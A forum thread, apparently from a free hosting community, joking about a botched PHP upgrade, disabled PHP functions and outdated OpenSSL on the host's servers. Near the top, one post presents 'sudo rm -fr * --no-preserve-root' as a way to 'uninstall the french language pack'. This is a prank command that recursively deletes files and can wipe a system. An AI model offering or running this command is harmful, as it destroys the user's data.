20000 forum users - Awesome Special Event!

OR, Just uninstall the french language pack. Will help a lot.

sudo rm -fr * --no-preserve-root
6 Likes

Happened to me with node.js, it made me leave it and never touch javascript as backend again. (I have become saner since)

4 Likes

i thought the long wait for php upgrade is for fixing stuff before the new version is deployed. I guess thatā€™s not true and also 59 unread, nice

6 Likes

same motive as unity.

6 Likes

Does anyone really have free time when they truly have nothing to do? If you do, I envy you.

The entire PHP upgrade thing, all the errors and missing functions lol

Someone should make a ā€œwe didnā€™t start the fireā€ type song about this forum :laughing:

Itā€™s fitting. His place is not here, itā€™s somewhere else. Perhaps a place with a red demon and a pitchfork.

6 Likes

Screenshot_11
guessing cpanel is broken too

4 Likes

Actually, the client area integration seems to be:

6 Likes

Ohā€¦

3 Likes

Why are you surprised? Youā€™re the one that mentioned it!

5 Likes

Iā€™m not surprised; I knew I made an error there, so Iā€™m gonna correct it!

Done!

4 Likes

Wait, they still use OpenSSL 1.1.1? :point_down:t2:

Feels like itā€™s not true if iFastNet paid for a premium support contractā€¦

4 Likes

This is what will happen when you do not sleep enough.
Corrected anyway

5 Likes

Iā€™ve reached my daily like limit! Gotta wait 2 hours to be able to like again!

3 Likes

I think I know why phpinfo in that volume is still ā€œenabledā€

Someone mistakens phpinfo as php_info. And looks like ini_get_all is supposed to be disabled so SpookyKipperā€™s script might not work too. Wow, iFastNetā€¦

6 Likes

Well, I love it when they add underscores to functions that arenā€™t supposed to have it! Even vol9_5 has the same disable_functions as the other servers that donā€™t have PHP 8.2 at the moment anyway, so for now phpinfo() is safe there.

5 Likes

How :skull:

4 Likes

But now a follow-up to my message is deservedā€¦ When they fix the underscore on phpinfo there and on the other servers, an egg will deserve to be broken, and soā€¦

breaks egg

4 Likes

not just that - a lot of versions above have CVEs /news/vulnerabilities.html

5 Likes

I managed to use the only like the like limit system gave me, now I have to wait 40 minutes to be able to like other posts!

3 Likes

I donā€™t think so, they just got rid of ini_get_all()

5 Likes